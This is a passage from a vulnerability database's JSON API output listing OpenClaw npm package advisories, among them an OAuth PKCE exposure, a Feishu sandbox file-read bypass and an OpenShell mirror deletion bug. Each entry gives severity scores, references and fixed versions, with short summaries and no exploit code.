"https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools" }, { "reference_url": "https://github.com/advisories/GHSA-7jp6-r74r-995q", "reference_id": "GHSA-7jp6-r74r-995q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7jp6-r74r-995q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-42433", "GHSA-7jp6-r74r-995q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qedr-a3ay-v3gx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89434?format=api", "vulnerability_id": "VCID-qjss-tvgk-3ubk", "summary": "Duplicate Advisory: OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9jpj-g8vv-j5mf. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.4.2 reuses the PKCE verifier as the OAuth state parameter in the Gemini OAuth flow, exposing it through the redirect URL. Attackers who capture the redirect URL can obtain both the authorization code and PKCE verifier, defeating PKCE protection and enabling token redemption.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter" }, { "reference_url": "https://github.com/advisories/GHSA-ch86-pxr9-j9h9", "reference_id": "GHSA-ch86-pxr9-j9h9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ch86-pxr9-j9h9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "GHSA-ch86-pxr9-j9h9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qjss-tvgk-3ubk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91256?format=api", "vulnerability_id": "VCID-qjvc-etb4-qbfv", "summary": "OpenClaw: Feishu extension resolveUploadInput bypasses file-system sandbox and allows arbitrary file reads via upload_image\n## Summary\n\nFeishu upload path resolution could read files outside the configured localRoots sandbox before handing them to the upload path.\n\n## Impact\n\nA tool caller constrained to workspace or localRoots paths could exfiltrate arbitrary host files through Feishu upload actions.\n\n## Affected Component\n\n`extensions/feishu/src/docx.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.6, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `764394c78b` (`fix: enforce localRoots sandbox on Feishu docx upload file reads`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41363", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18387", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18424", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18421", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41363" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41363", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41363" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter" }, { "reference_url": "https://github.com/advisories/GHSA-qf48-qfv4-jjm9", "reference_id": "GHSA-qf48-qfv4-jjm9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qf48-qfv4-jjm9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41363", "GHSA-qf48-qfv4-jjm9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qjvc-etb4-qbfv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89402?format=api", "vulnerability_id": "VCID-r5bw-c2py-9udf", "summary": "OpenClaw: OpenShell mirror mode could delete arbitrary remote directories when roots were mis-scoped\n## Summary\n\nBefore OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations.\n\n## Impact\n\nIf an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory and replace them with uploaded workspace data. This was a destructive remote-path bug in the mirror-sync path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `b21c9840c2e38f4bb338d031511b479d5f07ca25` — constrain OpenShell mirror sync roots\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @jufeng123768 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41383", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.1855", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18515", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", 